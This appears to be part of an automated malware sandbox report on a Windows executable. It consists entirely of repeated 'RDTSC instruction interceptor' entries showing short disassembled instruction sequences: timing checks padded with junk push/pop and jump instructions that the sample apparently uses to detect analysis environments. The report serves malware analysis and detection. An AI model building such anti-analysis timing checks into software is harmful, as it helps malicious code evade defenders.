              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79A8C6 second address: 79A8ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a js 00007F9F08C2E4B6h 0x00000010 ja 00007F9F08C2E4B6h 0x00000016 jnl 00007F9F08C2E4B6h 0x0000001c jl 00007F9F08C2E4B6h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79A8ED second address: 79A8F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79A8F3 second address: 79A8F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79A8F7 second address: 79A8FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79AA4B second address: 79AA51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79AA51 second address: 79AA5D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79AA5D second address: 79AA67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9F08C2E4B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79AD72 second address: 79AD76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79AD76 second address: 79AD7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79AD7F second address: 79ADA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9F08C2F7E9h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79ADA4 second address: 79ADB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F9F08C2E4B6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79AF2C second address: 79AF30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79AF30 second address: 79AF60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a jnl 00007F9F08C2E4C5h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9F08C2E4BDh 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79E585 second address: 79E5B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E3h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9F08C2F7E3h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79E5B5 second address: 79E5B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 79E5B9 second address: 79E5D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 731159 second address: 73115F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73115F second address: 731163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 731163 second address: 731176 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 731176 second address: 73117B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A27AC second address: 7A27B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A2919 second address: 7A292F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9F08C2F7E0h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A292F second address: 7A2938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A2938 second address: 7A293E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A293E second address: 7A2944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A3056 second address: 7A306B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F08C2F7DAh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A306B second address: 7A306F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A306F second address: 7A3091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F08C2F7E9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A336A second address: 7A3370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A3370 second address: 7A3386 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9F08C2F7E0h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A3386 second address: 7A338C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A338C second address: 7A3390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A3390 second address: 7A33AB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9F08C2E4B6h 0x00000008 jnc 00007F9F08C2E4B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jo 00007F9F08C2E4C0h 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A3650 second address: 7A3654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A3654 second address: 7A365C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A7CC5 second address: 7A7CCA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7A7CCA second address: 7A7CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AD0E1 second address: 7AD0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jp 00007F9F08C2F7D6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 72BFD4 second address: 72BFE0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9F08C2E4BEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7ABCFD second address: 7ABD0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F9F08C2F7DDh 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7ABD0F second address: 7ABD14 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7ABD14 second address: 7ABD1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7ABE47 second address: 7ABE4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7ABE4D second address: 7ABE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007F9F08C2F7E4h 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7ABE6A second address: 7ABE70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC4D4 second address: 7AC4ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F9F08C2F7E4h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC4ED second address: 7AC4F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC4F3 second address: 7AC4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC4F9 second address: 7AC512 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9F08C2E4B6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9F08C2E4BBh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC6C0 second address: 7AC6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 js 00007F9F08C2F7D6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC82E second address: 7AC848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9F08C2E4C1h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC848 second address: 7AC855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC855 second address: 7AC875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F9F08C2E4C0h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jp 00007F9F08C2E4B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC875 second address: 7AC886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jo 00007F9F08C2F7E0h 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC9B1 second address: 7AC9DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4C2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F9F08C2E4BDh 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC9DC second address: 7AC9E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC9E1 second address: 7AC9E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AC9E8 second address: 7AC9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7ACB58 second address: 7ACB72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9F08C2E4C3h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 72BFCA second address: 72BFD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F9F08C2F7D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7ACF72 second address: 7ACF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F9F08C2E4B6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AB8D1 second address: 7AB8D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AB8D5 second address: 7AB8DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AB8DB second address: 7AB8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AB8E1 second address: 7AB8E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AB8E7 second address: 7AB8F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F08C2F7DAh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7AB8F5 second address: 7AB91C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9F08C2E4B6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F9F08C2E4BAh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jc 00007F9F08C2E4B6h 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B0E0F second address: 7B0E14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B0E14 second address: 7B0E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B8764 second address: 7B877B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F9F08C2F7E2h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B877B second address: 7B87A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F9F08C2E4BBh 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 je 00007F9F08C2E4BCh 0x00000016 jl 00007F9F08C2E4B6h 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B87A0 second address: 7B87C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jmp 00007F9F08C2F7E9h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B87C4 second address: 7B87C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B8BA6 second address: 7B8BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B8BAA second address: 7B8BB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B8BB5 second address: 7B8BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B8BB9 second address: 7B8BBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76B338 second address: 76B3AF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F9F08C2F7DFh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F9F08C2F7D8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 call 00007F9F08C2F7DAh 0x0000002b push ebx 0x0000002c add edi, 0D62B652h 0x00000032 pop edi 0x00000033 pop edi 0x00000034 push 00000004h 0x00000036 call 00007F9F08C2F7E1h 0x0000003b movsx edx, ax 0x0000003e pop ecx 0x0000003f adc dl, 00000013h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F9F08C2F7E3h 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B905D second address: 7B9062 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7B9062 second address: 7B9068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 720446 second address: 720459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F08C2E4BFh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 720459 second address: 72045D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 72045D second address: 720466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 720466 second address: 72046D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 72046D second address: 720472 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7BD063 second address: 7BD06D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F9F08C2F7D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7BD06D second address: 7BD07E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9F08C2E4BBh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7BD07E second address: 7BD082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7BD082 second address: 7BD088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7BD088 second address: 7BD0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9F08C2F7E5h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7BD0A5 second address: 7BD0A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7BD0A9 second address: 7BD0AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7BD204 second address: 7BD20D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7BD20D second address: 7BD216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
